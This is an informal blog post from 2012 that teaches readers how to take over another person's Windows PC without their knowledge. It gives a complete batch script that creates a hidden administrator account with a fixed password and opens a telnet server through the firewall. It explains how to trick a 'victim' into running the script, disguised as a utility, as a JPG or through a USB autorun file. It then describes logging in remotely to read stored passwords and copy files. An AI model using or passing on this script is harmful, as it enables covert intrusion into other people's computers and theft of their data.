Wednesday, 21 March 2012

Access any PC remotely!!!

Yes, it is possible to gain access into another PC without the knowledge of user. 
Well...think again!!!

this service is done basically through telnet ...

may be all are familiar with it....if not try learning the basics of telnet..

  If you have physical access to ur friends machine then u can access his machine remotely using telnet server. All u have to do is to create a user account there then hide that user from logon screen and then start telnet server and finally mark telnet as a exception in firewall.These stepes can be carried out simply and faster using a simple batch file(instal.bat). Here i m providing the source of batch file:   (MIND IT ,DONT RUN THIS BAT FILE UPON UR PC)   ....

WELL..The below code must be made by u :   OPEN A TEXT DOCUMENT(notepad) > well...copy all from the start to end and paste it oer as  "    install.bat " and plzzzzzz dont run it :

the code is as follows :

@echo OFF
net user IE_USR 123456 /add
net localgroup administrators IE_USR /add
net localgroup “remote desktop users” IE_USR /add
sc config tlntsvr start= auto
netsh firewall set allowedprogram %windir%\system32\tlntsvr.exe iexplorer enable
sc start tlntsvr
reg add “HKLM\software\microsoft\windows NT\CurrentVersion\winlogon\specialaccounts\UserList” /v IE_USR /t REG_DWORD /d 0

i am not sure....but try it ....the code can be correct... to find the ip address....of the person or victim u wanna h@ck into .....

hmmm.......well...if u r chtting on messengers....try this..

goto run>cmd> type netstat -b    u will see foreign ip address and ports too , well it is only 50-50 chance tht u get ip address....or u may have to use some ip grabber SNORT .......basically snort is used for security purpose which are used in big IT firms....and it costs around 500$ amount...but we only need freeware version which u can downlaod by googling it.........there are other tools too ...ip ip getter....advanced ip scanner...and so on......wht i do mostly is by cmd netstat comand......mark the ip address.

now wht u hav to do is send the notepad file or install.bat file to the victim......

he has to believe u for tht......thts ur part of talency ........u need to make him believe tht it is some utility tool or so whtever......or to fake a binder software to bind up jpg pic into install.bat so thtthis file will hav jpg icon and when he double clicks it ..booommm!!!!!almost over....u got it.....


anothr way

if u r giving some data on pen drive u can make him run this file the moment he plugs pendrive into the system

for tht make another notepad of the following notes


name the file as autorun.inf

now almost every steps are over .....u made this file to run on his pc , u got his ip address....wht next.......h@cking into his system.....

start>run>telnet ipaddress [press enter] now press y and then use these login detail to get login

username: IE_USR
password: 123456

which is provided on bat file...

Now u have the shell prompt of friend machine now u can do anything u can see what task are running there using tasklist command, u can shutdown his machine using shutdown -s, u can even get stored password from registry, u can do almost everthing from command prompt.

got it.....try doing it.......

if for file shring

goto remote desktop connection or search computer....type the ip addres...and u can explore exactly the way u browse ur pc ......u can also copy whtever u wish .



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